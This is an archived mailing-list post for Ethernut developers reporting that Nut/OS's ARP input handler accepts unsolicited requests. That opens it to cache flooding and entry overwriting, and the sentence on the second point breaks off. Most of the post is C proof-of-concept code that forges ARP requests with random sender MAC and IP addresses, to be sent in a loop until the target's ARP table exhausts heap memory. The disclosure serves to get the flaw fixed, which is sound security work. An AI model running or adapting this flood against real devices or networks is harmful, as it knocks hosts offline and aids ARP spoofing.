[En-Nut-Discussion] security leak in ARP
Dirk.Kaufmann at raumcomputer.com
Dirk.Kaufmann at raumcomputer.com
Wed Oct 7 15:25:05 CEST 2009
security leak in ARP
the function void NutArpInput(NUTDEVICE * dev, NETBUF * nb) in net/arpin.c
adds an entry into the arp-table when ethernut receives an arp-request.
this implementation is proposed in rfc 826. this open 2 security leaks:
1. nut/os will create a new entry when receiving a request, making a
flood attack possible. nut will use up eventually all the heap-memory
for faked arp entries.
2. nut/os will update the mac of existing entries, enabling a
this is a sourcecode for nut/os to do a flood attack. it sends a faked
arp request, with random sender ip and mac. to fill up the destination
arp-cache. call void send_fake_request() in a loop...
#include <sys/device.h>
#include <sys/confnet.h>
#include <arpa/inet.h>
#include <netinet/if_ether.h>
#include <dev/board.h>
#include <string.h>
#include <stdlib.h>
#include <stdio.h>
NETBUF *NutArpAllocNetBuf2(uint16_t type, uint32_t ip, uint8_t * mac)
if ((nb = NutNetBufAlloc(0, NBAF_NETWORK, sizeof(ETHERARP))) == 0)
return 0;
ea = nb->nb_nw.vp; // data buffer
ah = (ARPHDR *) & ea->ea_hdr;
* Set ARP header.
ah->ar_hrd = htons(ARPHRD_ETHER);
ah->ar_pro = htons(ETHERTYPE_IP);
ah->ar_hln = 6;
ah->ar_pln = 4;
ah->ar_op = htons(type);
* Set ARP destination data.
if (mac)
memcpy(ea->arp_tha, mac, 6);
memset(ea->arp_tha, 0xff, 6); // mac = NULL;
ea->arp_tpa = ip;
// fake sender mac
for(int i=0;i<6;i++)
ea->arp_sha[i] = rand() & 0xFF;
return nb;
int NutArpOutput2(NUTDEVICE * dev, NETBUF * nb)
IFNET *nif;
ea = nb->nb_nw.vp;
* Set ARP source data.
nif = dev->dev_icb;
//memcpy(ea->arp_sha, nif->if_mac, 6);
//ea->arp_spa = nif->if_local_ip;
// fake sender ip
ea->arp_spa &= 0x00FFFFFF;
ea->arp_spa += ((uint32_t)(rand()%0xff)) << 24;
return (*nif->if_output)(dev, ETHERTYPE_ARP, ea->arp_tha, nb);
void send_fake_request(void)
uint32_t ip = inet_addr(""); // destination ip, we will
fill the arp-cache on this host
NETBUF *nb = 0;
nb = NutArpAllocNetBuf2(ARPOP_REQUEST, ip, 0);
NutArpOutput2(dev, nb);
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